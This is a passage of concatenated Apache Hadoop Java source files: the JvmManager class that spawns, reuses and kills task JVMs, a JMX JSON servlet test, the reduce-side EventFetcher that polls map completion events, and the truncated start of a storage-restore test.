return mapJvmManager.getTaskForJvm(jvmId);
} else {
return reduceJvmManager.getTaskForJvm(jvmId);
}
}
public void taskFinished(TaskRunner tr) {
if (tr.getTask().isMapTask()) {
mapJvmManager.taskFinished(tr);
} else {
reduceJvmManager.taskFinished(tr);
}
}
public void taskKilled(TaskRunner tr) throws IOException,
InterruptedException {
if (tr.getTask().isMapTask()) {
mapJvmManager.taskKilled(tr);
} else {
reduceJvmManager.taskKilled(tr);
}
}
public void killJvm(JVMId jvmId) throws IOException, InterruptedException {
if (jvmId.isMap) {
mapJvmManager.killJvm(jvmId);
} else {
reduceJvmManager.killJvm(jvmId);
}
}
/**
* Adds the task's work dir to the cleanup queue of taskTracker for
* asynchronous deletion of work dir.
*
* @param tracker
* taskTracker
* @param task
* the task whose work dir needs to be deleted
*/
static void deleteWorkDir(TaskTracker tracker, Task task) {
String user = task.getUser();
String jobid = task.getJobID().toString();
String taskid = task.getTaskID().toString();
String workDir = TaskTracker.getTaskWorkDir(user, jobid, taskid,
task.isTaskCleanupTask());
String userDir = TaskTracker.getUserDir(user);
tracker.getCleanupThread().addToQueue(
new TaskController.DeletionContext(tracker.getTaskController(),
false, user, workDir.substring(userDir.length())));
}
static class JvmManagerForType {
// Mapping from the JVM IDs to running Tasks
Map<JVMId, TaskRunner> jvmToRunningTask = new HashMap<JVMId, TaskRunner>();
// Mapping from the tasks to JVM IDs
Map<TaskRunner, JVMId> runningTaskToJvm = new HashMap<TaskRunner, JVMId>();
// Mapping from the JVM IDs to Reduce JVM processes
Map<JVMId, JvmRunner> jvmIdToRunner = new HashMap<JVMId, JvmRunner>();
// Mapping from the JVM IDs to process IDs
Map<JVMId, String> jvmIdToPid = new HashMap<JVMId, String>();
private static String SYSTEM_PATH_SEPARATOR = System
.getProperty("path.separator");
AtomicInteger currentJvmId = new AtomicInteger(0);
LocalDirAllocator lDirAllocator = new LocalDirAllocator(
"mapred.local.dir");
int maxJvms;
boolean isMap;
private final long sleeptimeBeforeSigkill;
Random rand = new Random(System.currentTimeMillis());
static final String DELAY_BEFORE_KILL_KEY = "mapred.tasktracker.tasks.sleeptime-before-sigkill";
// number of milliseconds to wait between TERM and KILL.
private static final long DEFAULT_SLEEPTIME_BEFORE_SIGKILL = 250;
private TaskTracker tracker;
public JvmManagerForType(int maxJvms, boolean isMap, TaskTracker tracker)
throws IOException {
this.maxJvms = maxJvms;
this.isMap = isMap;
this.tracker = tracker;
sleeptimeBeforeSigkill = tracker.getJobConf().getLong(
DELAY_BEFORE_KILL_KEY, DEFAULT_SLEEPTIME_BEFORE_SIGKILL);
launchJvms();
}
private void launchJvms() throws IOException {
for (int i = 0; i < maxJvms; ++i) {
launchJvmWithNoTask(currentJvmId.getAndIncrement());
}
}
private void launchJvmWithNoTask(int i) throws IOException {
JVMId jvmId = new JVMId(isMap, i);
JvmEnv env = getDefaultJvmEnv(jvmId);
JvmRunner jvmRunner = new JvmRunner(env, jvmId);
jvmRunner.setDaemon(true);
jvmRunner.setName("JVM Runner " + jvmRunner.jvmId + " spawned.");
jvmIdToRunner.put(jvmId, jvmRunner);
LOG.info(jvmRunner.getName());
jvmRunner.start();
}
private void launchJvmWithTask(int i, TaskRunner t) throws IOException {
JVMId jvmId = new JVMId(isMap, i);
JvmEnv env = getDefaultJvmEnv(jvmId);
JvmRunner jvmRunner = new JvmRunner(env, jvmId);
jvmRunner.setDaemon(true);
jvmIdToRunner.put(jvmId, jvmRunner);
this.setRunningTaskForJvm(jvmId, t);
jvmRunner.setName("JVM Runner " + jvmRunner.jvmId + " spawned.");
LOG.info(jvmRunner.getName());
jvmRunner.start();
}
private JvmEnv getDefaultJvmEnv(JVMId id) throws IOException {
JobConf conf = tracker.getJobConf();
String jvmSubDir = TaskTracker.SUBDIR + Path.SEPARATOR + id;
Path jvmDir = lDirAllocator.getLocalPathForWrite(jvmSubDir,
tracker.getJobConf());
Path workDir = new Path(jvmDir, "work");
Path logDir = new Path(jvmDir, "log");
FileSystem localFS = FileSystem.getLocal(conf);
if (!localFS.exists(jvmDir)) {
localFS.mkdirs(jvmDir);
localFS.mkdirs(workDir);
localFS.mkdirs(logDir);
}
List<String> setupCmds = getSetupCmds(workDir, logDir);
Vector<String> vmArgs = getVMArgs(new File(workDir.toString()),
logDir, conf);
Path stdout = new Path(logDir, TaskLog.LogName.STDOUT.toString());
Path stderr = new Path(logDir, TaskLog.LogName.STDERR.toString());
return new JvmEnv(setupCmds, vmArgs, new File(stdout.toString()),
new File(stderr.toString()),
TaskLog.getTaskLogLength(conf),
new File(workDir.toString()), conf);
}
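// The command line assembled by getVMArgs() below looks roughly like
// (paths and host/port elided, purely illustrative):
//   $JAVA_HOME/bin/java -Djava.library.path=<libs> <user child opts>
//     -classpath <task classpath> -Djava.io.tmpdir=<tmp>
//     -Dhadoop.log.dir=<log dir> -Dhadoop.root.logger=INFO,TLA
//     org.apache.hadoop.mapred.Child <tracker host> <tracker port> <1|0> <log dir>
// JvmRunner.runChild() later appends the numeric JVM id as the last argument.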
private Vector<String> getVMArgs(File workDir, Path logDir, JobConf conf)
throws IOException {
Path logFileName = new Path(logDir,
TaskLog.LogName.SYSLOG.toString());
List<String> classPaths = TaskRunner.getClassPaths(conf, new File(
workDir.toString()), null);
long logSize = TaskLog.getTaskLogLength(conf);
// java
Vector<String> vmArgs = new Vector<String>();
File jvm = new File(
new File(System.getProperty("java.home"), "bin"), "java");
vmArgs.add(jvm.toString());
// child opts
String childOptStr = conf.get(JobConf.MAPRED_TASK_JAVA_OPTS,
JobConf.DEFAULT_MAPRED_TASK_JAVA_OPTS);
String javaOptsSplit[] = childOptStr.trim().split("\\s+");
String libraryPath = System.getProperty("java.library.path");
if (libraryPath == null) {
libraryPath = workDir.getAbsolutePath();
} else {
libraryPath += SYSTEM_PATH_SEPARATOR + workDir;
}
boolean hasUserLDPath = false;
for (int i = 0; i < javaOptsSplit.length; i++) {
if (javaOptsSplit[i].startsWith("-Djava.library.path=")) {
javaOptsSplit[i] += SYSTEM_PATH_SEPARATOR + libraryPath;
hasUserLDPath = true;
break;
}
}
if (!hasUserLDPath) {
vmArgs.add("-Djava.library.path=" + libraryPath);
}
for (int i = 0; i < javaOptsSplit.length; i++) {
vmArgs.add(javaOptsSplit[i]);
}
String tmp = conf.get("mapred.child.tmp", "./tmp");
Path tmpDir = new Path(tmp);
if (!tmpDir.isAbsolute()) {
tmpDir = new Path(workDir.toString(), tmpDir);
}
// Add classpath.
vmArgs.add("-classpath");
String classPath = StringUtils.join(SYSTEM_PATH_SEPARATOR,
classPaths);
vmArgs.add(classPath);
vmArgs.add("-Djava.io.tmpdir=" + tmpDir);
vmArgs.add("-Dhadoop.log.dir="
+ new File(System.getProperty("hadoop.log.dir"))
.getAbsolutePath());
vmArgs.add("-Dhadoop.root.logger=INFO,TLA");
vmArgs.add("-D" + TaskLogAppender.LOGSIZE_PROPERTY + "=" + logSize);
vmArgs.add("-D" + TaskLogAppender.LOG_FILE_NAME + "=" + logFileName);
vmArgs.add(Child.class.getName()); // main of Child
// pass umbilical address
InetSocketAddress address = tracker.getTaskTrackerReportAddress();
vmArgs.add(address.getAddress().getHostAddress());
vmArgs.add(Integer.toString(address.getPort()));
vmArgs.add(this.isMap ? "1" : "0"); // pass task identifier
// pass task log location
vmArgs.add(logDir.toString());
return vmArgs;
}
private List<String> getSetupCmds(Path workDir, Path logDir) {
List<String> setupCmds = new ArrayList<String>();
Map<String, String> env = new HashMap<String, String>();
// HADOOP_WORK_DIR
env.put(TaskRunner.HADOOP_WORK_DIR, workDir.toString());
// LD_LIBRARY_PATH
StringBuffer ldLibraryPath = new StringBuffer();
ldLibraryPath.append(workDir.toString());
String oldLdLibraryPath = null;
oldLdLibraryPath = System.getenv("LD_LIBRARY_PATH");
if (oldLdLibraryPath != null) {
ldLibraryPath.append(Path.SEPARATOR);
ldLibraryPath.append(oldLdLibraryPath);
}
env.put("LD_LIBRARY_PATH", ldLibraryPath.toString());
// HADOOP_ROOT_LOGGER
env.put("HADOOP_ROOT_LOGGER", "INFO,TLA");
TaskRunner.appendEnvExports(setupCmds, env);
return setupCmds;
}
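// The setup commands produced above are environment exports (roughly of the
// form `export NAME="value"`, assuming TaskRunner.appendEnvExports keeps that
// shape) for HADOOP_WORK_DIR, LD_LIBRARY_PATH and HADOOP_ROOT_LOGGER,
// executed before the child JVM is launched.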
public synchronized void setRunningTaskForJvm(JVMId jvmId, TaskRunner t) {
JvmRunner jvmRunner = jvmIdToRunner.get(jvmId);
synchronized (jvmRunner) {
jvmToRunningTask.put(jvmId, t);
runningTaskToJvm.put(t, jvmId);
jvmIdToRunner.get(jvmId).setBusy(true);
jvmRunner.notify();
}
}
public synchronized boolean validateTipToJvm(TaskInProgress tip, JVMId jvmId) {
if (jvmId == null) {
LOG.warn("Null jvmId. Cannot verify Jvm. validateTipToJvm returning false");
return false;
}
TaskRunner taskRunner = jvmToRunningTask.get(jvmId);
if (taskRunner == null) {
return false; // JvmId not known.
}
TaskInProgress knownTip = taskRunner.getTaskInProgress();
// Is comparing references sufficient here, or should equals() be used?
return knownTip == tip;
}
public TaskInProgress getTaskForJvmNoWait(JVMId jvmId) {
if (jvmToRunningTask.containsKey(jvmId)) {
// In case of JVM reuse, tasks are returned to a previously launched
// JVM via this method. However, when a new task is launched the
// task being returned has to be initialized.
TaskRunner taskRunner = jvmToRunningTask.get(jvmId);
JvmRunner jvmRunner = jvmIdToRunner.get(jvmId);
if(jvmRunner == null)
return null;
Task task = taskRunner.getTaskInProgress().getTask();
jvmRunner.taskGiven(task);
return taskRunner.getTaskInProgress();
} else {
return null;
}
}
public TaskInProgress getTaskForJvm(JVMId jvmId) throws IOException {
TaskInProgress result = null;
JvmRunner jvmRunner = null;
synchronized(this) {
jvmRunner = jvmIdToRunner.get(jvmId);
if (jvmRunner == null) {
LOG.error("Cannot find jvm runner with jvmid " + jvmId);
return null;
}
result = getTaskForJvmNoWait(jvmId);
}
if(result != null)
return result;
else {
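// No task has been bound to this JVM yet: wait briefly for
// setRunningTaskForJvm() to notify this runner, then re-check
// under the manager lock.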
synchronized (jvmRunner) {
try {
jvmRunner.wait(3000);
} catch(Exception e) {
return null;
}
}
synchronized(this) {
jvmRunner = jvmIdToRunner.get(jvmId);
if (jvmRunner == null) {
return null;
}
return getTaskForJvmNoWait(jvmId);
}
}
}
public synchronized boolean isJvmknown(JVMId jvmId) {
return jvmIdToRunner.containsKey(jvmId);
}
public synchronized void taskFinished(TaskRunner tr) {
JVMId jvmId = runningTaskToJvm.remove(tr);
if (jvmId != null) {
jvmToRunningTask.remove(jvmId);
JvmRunner jvmRunner;
if ((jvmRunner = jvmIdToRunner.get(jvmId)) != null) {
jvmRunner.taskRan();
}
}
}
public synchronized void taskKilled(TaskRunner tr) throws IOException,
InterruptedException {
JVMId jvmId = runningTaskToJvm.remove(tr);
if (jvmId != null) {
jvmToRunningTask.remove(jvmId);
killJvm(jvmId);
}
}
public synchronized void killJvm(JVMId jvmId) throws IOException,
InterruptedException {
JvmRunner jvmRunner;
if ((jvmRunner = jvmIdToRunner.get(jvmId)) != null) {
killJvmRunner(jvmRunner);
}
}
public synchronized void stop() throws IOException, InterruptedException {
// Killing a JVM removes its entry from the jvmIdToRunner map, so we
// iterate over a copy of the values (otherwise we would hit a
// ConcurrentModificationException).
List<JvmRunner> list = new ArrayList<JvmRunner>();
list.addAll(jvmIdToRunner.values());
for (JvmRunner jvm : list) {
killJvmRunner(jvm);
}
}
private synchronized void killJvmRunner(JvmRunner jvmRunner) throws IOException,
InterruptedException {
jvmRunner.kill();
removeJvm(jvmRunner.jvmId);
}
private synchronized void removeJvm(JVMId jvmId) {
jvmIdToRunner.remove(jvmId);
jvmIdToPid.remove(jvmId);
}
private synchronized void reapJvm(TaskRunner t, JvmEnv env) throws IOException,
InterruptedException {
if (t.getTaskInProgress().wasKilled()) {
// the task was killed in-flight
// no need to do the rest of the operations
return;
}
boolean spawnNewJvm = false;
JobID jobId = t.getTask().getJobID();
// Check whether there is a free slot to start a new JVM.
// or kill an idle JVM and launch a new one.
// When this method is called, we *must*
// (1) spawn a new JVM (if we are below the max)
// (2) find an idle JVM (that belongs to the same job), or,
// (3) kill an idle JVM (from a different job)
// (the order of return is in the order above)
int numJvmsSpawned = jvmIdToRunner.size();
if (numJvmsSpawned >= maxJvms) {
// go through the list of JVMs for all jobs.
Iterator<Map.Entry<JVMId, JvmRunner>> jvmIter = jvmIdToRunner
.entrySet().iterator();
while (jvmIter.hasNext()) {
JvmRunner jvmRunner = jvmIter.next().getValue();
// look for an idle JVM; if one exists, reserve it for this task
if (!jvmRunner.isBusy()) {
setRunningTaskForJvm(jvmRunner.jvmId, t); // reserve the JVM
LOG.info("No new JVM spawned for jobId/taskid: "
+ jobId + "/" + t.getTask().getTaskID()
+ ". Attempting to reuse: "
+ jvmRunner.jvmId);
return;
}
}
} else {
spawnNewJvm = true;
}
if (spawnNewJvm) {
spawnNewJvm(jobId, env, t);
return;
}
// *MUST* never reach this
LOG.fatal("Inconsistent state!!! "
+ "JVM Manager reached an unstable state "
+ "while reaping a JVM for task: "
+ t.getTask().getTaskID() + " " + getDetails()
+ ". Aborting. ");
System.exit(-1);
}
private String getDetails() {
StringBuffer details = new StringBuffer();
details.append("Number of active JVMs:").append(
jvmIdToRunner.size());
Iterator<JVMId> jvmIter = jvmIdToRunner.keySet().iterator();
while (jvmIter.hasNext()) {
JVMId jvmId = jvmIter.next();
details.append("\n JVMId ")
.append(jvmId.toString())
.append(" #Tasks ran: ")
.append(jvmIdToRunner.get(jvmId).numTasksRan)
.append(" Currently busy? ")
.append(jvmIdToRunner.get(jvmId).busy)
.append(" Currently running: ")
.append(jvmToRunningTask.get(jvmId).getTask()
.getTaskID().toString());
}
return details.toString();
}
private void spawnNewJvm(JobID jobId, JvmEnv env, TaskRunner t)
throws IOException {
this.launchJvmWithTask(currentJvmId.getAndIncrement(), t);
}
private synchronized void updateOnJvmExit(JVMId jvmId, int exitCode) {
removeJvm(jvmId);
TaskRunner t = jvmToRunningTask.remove(jvmId);
if (t != null) {
runningTaskToJvm.remove(t);
if (exitCode != 0) {
t.setExitCode(exitCode);
}
t.signalDone();
}
}
class JvmRunner extends Thread {
JvmEnv env;
volatile boolean killed = false;
volatile int numTasksRan;
final int numTasksToRun;
JVMId jvmId;
volatile boolean busy = true;
private ShellCommandExecutor shexec; // shell terminal for running
// the task
private Task firstTask;
private List<Task> tasksGiven = new ArrayList<Task>();
void taskGiven(Task task) {
tasksGiven.add(task);
}
public JvmRunner(JvmEnv env, JVMId jvmId) {
this.env = env;
numTasksToRun = 0;
this.jvmId = jvmId;
this.firstTask = null;
this.busy = false;
}
public JvmRunner(JvmEnv env, JobID jobId, Task firstTask) {
this.env = env;
this.jvmId = new JVMId(isMap, rand.nextInt());
this.numTasksToRun = env.conf.getNumTasksToExecutePerJvm();
this.firstTask = firstTask;
LOG.info("In JvmRunner constructed JVM ID: " + jvmId);
}
@Override
public void run() {
try {
runChild(env);
} catch (InterruptedException ie) {
return;
} catch (IOException e) {
LOG.warn("Caught IOException in JVMRunner", e);
} catch (Throwable e) {
LOG.error(
"Caught Throwable in JVMRunner. Aborting TaskTracker.",
e);
System.exit(1);
} finally {
jvmFinished();
}
}
public void runChild(JvmEnv env) throws IOException,
InterruptedException {
int exitCode = 0;
try {
env.vargs.add(Integer.toString(jvmId.getId()));
String user = UserGroupInformation.getCurrentUser()
.getUserName();
exitCode = tracker.getTaskController().launchTask(user,
null, null, env.setup, env.vargs, env.workDir,
env.stdout.toString(), env.stderr.toString());
} catch (IOException ioe) {
// do nothing
// error and output are appropriately redirected
} finally { // handle the exit code
// although the process has exited before we get here,
// make sure the entire process group has also been killed.
kill();
updateOnJvmExit(jvmId, exitCode);
LOG.info("JVM : " + jvmId + " exited with exit code "
+ exitCode + ". Number of tasks it ran: "
+ numTasksRan);
FileUtil.fullyDelete(env.workDir);
}
}
private class DelayedProcessKiller extends Thread {
private final String user;
private final int pid;
private final long delay;
private final Signal signal;
DelayedProcessKiller(String user, int pid, long delay,
Signal signal) {
this.user = user;
this.pid = pid;
this.delay = delay;
this.signal = signal;
setName("Task killer for " + pid);
setDaemon(false);
}
@Override
public void run() {
try {
Thread.sleep(delay);
tracker.getTaskController().signalTask(user, pid,
signal);
} catch (InterruptedException e) {
return;
} catch (IOException e) {
LOG.warn("Exception when killing task " + pid, e);
}
}
}
synchronized void kill() throws IOException, InterruptedException {
if (!killed) {
TaskController controller = tracker.getTaskController();
// Check the initial context before issuing a kill, to prevent
// situations where a kill is issued before the task is launched.
String pidStr = jvmIdToPid.get(jvmId);
if (pidStr != null) {
String user = env.conf.getUser();
int pid = Integer.parseInt(pidStr);
// Schedule a KILL after the configured delay, then send TERM so
// the process gets a chance to exit cleanly first.
if (sleeptimeBeforeSigkill > 0) {
new DelayedProcessKiller(user, pid,
sleeptimeBeforeSigkill, Signal.KILL)
.start();
controller.signalTask(user, pid, Signal.TERM);
} else {
controller.signalTask(user, pid, Signal.KILL);
}
} else {
LOG.info(String.format(
"JVM Not killed %s but just removed",
jvmId.toString()));
}
killed = true;
}
}
// Post-JVM-exit log processing: inform the user log manager.
private void jvmFinished() {
JvmFinishedEvent jfe = new JvmFinishedEvent(new JVMInfo(
TaskLog.getAttemptDir(firstTask.getTaskID(),
firstTask.isTaskCleanupTask()), tasksGiven));
tracker.getUserLogManager().addLogEvent(jfe);
}
public void taskRan() {
busy = false;
numTasksRan++;
}
public boolean ranAll() {
return (numTasksRan == numTasksToRun);
}
public void setBusy(boolean busy) {
this.busy = busy;
}
public boolean isBusy() {
return busy;
}
}
}
static class JvmEnv { // Helper class
List<String> vargs;
List<String> setup;
File stdout;
File stderr;
File workDir;
long logSize;
JobConf conf;
Map<String, String> env;
public JvmEnv(List<String> setup, Vector<String> vargs, File stdout,
File stderr, long logSize, File workDir, JobConf conf) {
this.setup = setup;
this.vargs = vargs;
this.stdout = stdout;
this.stderr = stderr;
this.workDir = workDir;
this.conf = conf;
}
}
}
<|start_filename|>src/test/org/apache/hadoop/jmx/TestJMXJsonServlet.java<|end_filename|>
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.jmx;
import static org.junit.Assert.*;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.http.HttpServer;
import org.junit.AfterClass;
import org.junit.BeforeClass;
import org.junit.Test;
public class TestJMXJsonServlet {
private static final Log LOG = LogFactory.getLog(TestJMXJsonServlet.class);
private static HttpServer server;
private static URL baseUrl;
private String readOutput(URL url) throws IOException {
StringBuilder out = new StringBuilder();
InputStream in = url.openConnection().getInputStream();
byte[] buffer = new byte[64 * 1024];
int len = in.read(buffer);
while (len > 0) {
out.append(new String(buffer, 0, len));
len = in.read(buffer);
}
in.close();
return out.toString();
}
@BeforeClass public static void setup() throws Exception {
new File(System.getProperty("build.webapps", "build/webapps") + "/test"
).mkdirs();
server = new HttpServer("test", "0.0.0.0", 0, true);
server.start();
int port = server.getPort();
baseUrl = new URL("http://localhost:" + port + "/");
}
@AfterClass public static void cleanup() throws Exception {
server.stop();
}
public static void assertReFind(String re, String value) {
Pattern p = Pattern.compile(re);
Matcher m = p.matcher(value);
assertTrue("'"+p+"' does not match "+value, m.find());
}
@Test public void testQuery() throws Exception {
String result = readOutput(new URL(baseUrl, "/jmx?qry=java.lang:type=Runtime"));
LOG.info("/jmx?qry=java.lang:type=Runtime RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Runtime\"", result);
assertReFind("\"modelerType\"", result);
result = readOutput(new URL(baseUrl, "/jmx?qry=java.lang:type=Memory"));
LOG.info("/jmx?qry=java.lang:type=Memory RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
assertReFind("\"modelerType\"", result);
result = readOutput(new URL(baseUrl, "/jmx"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
// test to get an attribute of a mbean
result = readOutput(new URL(baseUrl,
"/jmx?get=java.lang:type=Memory::HeapMemoryUsage"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
assertReFind("\"committed\"\\s*:", result);
// negative test to get an attribute of a mbean
result = readOutput(new URL(baseUrl,
"/jmx?get=java.lang:type=Memory::"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"ERROR\"", result);
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/EventFetcher.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.IOException;
import java.net.URI;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.mapred.JvmContext;
import org.apache.hadoop.mapred.MapTaskCompletionEventsUpdate;
import org.apache.hadoop.mapred.TaskCompletionEvent;
import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.TaskAttemptID;
// Periodically queries the task tracker for map completion events.
class EventFetcher<K, V> extends Thread
{
private static final long SLEEP_TIME = 1000;
private static final int MAX_EVENTS_TO_FETCH = 10000;
private static final int MAX_RETRIES = 10;
private static final int RETRY_PERIOD = 5000;
private static final Log LOG = LogFactory.getLog(EventFetcher.class);
private final TaskAttemptID reduce;
private final TaskUmbilicalProtocol umbilical;
private final ShuffleScheduler<K, V> scheduler;
private final JvmContext jvmContext;
private int fromEventId = 0;
private ExceptionReporter exceptionReporter = null;
private int maxMapRuntime = 0;
private final int shufflePort;
public EventFetcher(TaskAttemptID reduce, TaskUmbilicalProtocol umbilical,
ShuffleScheduler<K, V> scheduler, ExceptionReporter reporter, JvmContext jvmContext,
int shufflePort)
{
setName("EventFetcher for fetching Map Completion Events");
setDaemon(true);
this.reduce = reduce;
this.umbilical = umbilical;
this.scheduler = scheduler;
this.jvmContext = jvmContext;
this.shufflePort = shufflePort;
exceptionReporter = reporter;
}
@Override
public void run()
{
int failures = 0;
LOG.info(reduce + " Thread started: " + getName());
try
{
while (!Thread.currentThread().isInterrupted())
{
try
{
int numNewMaps = getMapCompletionEvents();
failures = 0;
if (numNewMaps > 0)
{
LOG.info(reduce + ": " + "Got " + numNewMaps + " new map-outputs");
}
LOG.debug("GetMapEventsThread about to sleep for " + SLEEP_TIME);
if (!Thread.currentThread().isInterrupted())
{
// back off before polling the task tracker again
Thread.sleep(SLEEP_TIME);
}
}
catch (IOException ie)
{
LOG.info("Exception in getting events", ie);
// check to see whether to abort
if (++failures >= MAX_RETRIES)
{
throw new IOException("too many failures downloading events", ie);
}
// sleep for a bit
if (!Thread.currentThread().isInterrupted())
{
Thread.sleep(RETRY_PERIOD);
}
}
}
}
catch (InterruptedException e)
{
return;
}
catch (Throwable t)
{
exceptionReporter.reportException(t);
return;
}
}
/**
* Queries the {@link TaskTracker} for a set of map-completion events from a
* given event ID.
*
* @throws IOException
*/
private int getMapCompletionEvents() throws IOException
{
int numNewMaps = 0;
MapTaskCompletionEventsUpdate update = umbilical.getMapCompletionEvents(reduce.getJobID(),
fromEventId, MAX_EVENTS_TO_FETCH, reduce, jvmContext);
TaskCompletionEvent events[] = update.getMapTaskCompletionEvents();
LOG.debug("Got " + events.length + " map completion events from " + fromEventId);
// Check if the reset is required.
// Since there is no ordering of the task completion events at the
// reducer, the only option to sync with the new jobtracker is to reset
// the events index
if (update.shouldReset())
{
fromEventId = 0;
scheduler.resetKnownMaps();
}
// Update the last seen event ID
fromEventId += events.length;
// Process the TaskCompletionEvents:
// 1. Save the SUCCEEDED maps in knownOutputs to fetch the outputs.
// 2. Save the OBSOLETE/FAILED/KILLED maps in obsoleteOutputs to stop
// fetching from those maps.
// 3. Remove TIPFAILED maps from neededOutputs since we don't need their
// outputs at all.
for (TaskCompletionEvent event : events)
{
switch (event.getTaskStatus())
{
case SUCCEEDED:
URI u = getBaseURI(event.getTaskTrackerHttp());
scheduler.addKnownMapOutput(u.getHost() + ":" + u.getPort(), u.toString(),
event.getTaskAttemptId());
numNewMaps++;
int duration = event.getTaskRunTime();
if (duration > maxMapRuntime)
{
maxMapRuntime = duration;
scheduler.informMaxMapRunTime(maxMapRuntime);
}
break;
case FAILED:
case KILLED:
case OBSOLETE:
scheduler.obsoleteMapOutput(event.getTaskAttemptId());
LOG.info("Ignoring obsolete output of " + event.getTaskStatus()
+ " map-task: '" + event.getTaskAttemptId() + "'");
break;
case TIPFAILED:
scheduler.tipFailed(event.getTaskAttemptId().getTaskID());
LOG.info("Ignoring output of failed map TIP: '" + event.getTaskAttemptId()
+ "'");
break;
}
}
return numNewMaps;
}
// replace http port with netty shuffle port
private String substitutePort(String url)
{
String result;
int portStart = url.lastIndexOf(":");
result = url.substring(0, portStart + 1) + shufflePort;
return result;
}
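// For illustration only (hypothetical host, port and ids): a tracker URL
// such as http://tt-host:50060 becomes
// http://tt-host:<shufflePort>/mapOutput?job=job_201101010000_0001&reduce=3&map=
// with the map attempt ids presumably appended later when outputs are fetched.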
private URI getBaseURI(String url)
{
url = substitutePort(url);
StringBuffer baseUrl = new StringBuffer(url);
if (!url.endsWith("/"))
{
baseUrl.append("/");
}
baseUrl.append("mapOutput?job=");
baseUrl.append(reduce.getJobID());
baseUrl.append("&reduce=");
baseUrl.append(reduce.getTaskID().getId());
baseUrl.append("&map=");
URI u = URI.create(baseUrl.toString());
return u;
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestStorageRestore.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.assertTrue;
import java.io.File;
import java.io.IOException;
import java.util.Random;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.server.common.Storage;
import org.apache.hadoop.hdfs.server.namenode.FSImage.NameNodeFile;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
/**
* Test restoring failed storage directories on checkpoint.
*/
public class TestStorageRestore {
public static final String NAME_NODE_HOST = "localhost:";
public static final String NAME_NODE_HTTP_HOST = "0.0.0.0:";
private Configuration config;
private File hdfsDir=null;
static final long seed = 0xAAAAEEFL;
static final int blockSize = 4096;
static final int fileSize = 8192;
private File path1, path2, path3;
private MiniDFSCluster cluster;
private void writeFile(FileSystem fileSys, Path name, int repl)
throws IOException {
FSDataOutputStream stm = fileSys.create(name, true,
fileSys.getConf().getInt("io.file.buffer.size", 4096),
(short)repl, (long)blockSize);
byte[] buffer = new byte[fileSize];
Random rand = new Random(seed);
rand.nextBytes(buffer);
stm.write(buffer);
stm.close();
}
@Before
public void setUpNameDirs() throws Exception {
config = new Configuration();
String baseDir = System.getProperty("test.build.data", "/tmp");
hdfsDir = new File(baseDir, "dfs");
if (hdfsDir.exists()) {
FileUtil.fullyDelete(hdfsDir);
}
hdfsDir.mkdir();
path1 = new File(hdfsDir, "name1");
path2 = new File(hdfsDir, "name2");
path3 = new File(hdfsDir, "name3");
path1.mkdir();
path2.mkdir();
path3.mkdir();
String nameDir = path1.getPath() + "," + path2.getPath();
config.set("dfs.name.dir", nameDir);
config.set("dfs.name.edits.dir", nameDir + "," + path3.getPath());
config.set("fs.checkpoint.dir",new File(hdfsDir, "secondary").getPath());
FileSystem.setDefaultUri(config, "hdfs://"+NAME_NODE_HOST + "0");
config.set("dfs.secondary.http.address", "0.0.0.0:0");
config.setBoolean("dfs.name.dir.restore", true);
}
@After
public void cleanUpNameDirs() throws Exception {
if (hdfsDir.exists()) {
FileUtil.fullyDelete(hdfsDir);
}
}
/**
* Remove edits and storage directories.
*/
public void invalidateStorage(FSImage fi) throws IOException {
fi.getEditLog().removeEditsAndStorageDir(2); // name3
fi.getEditLog().removeEditsAndStorageDir(1); // name2
}
/**
* Check the lengths of the image and edits files.
*/
public void checkFiles(boolean expectValid) {
final String imgName =
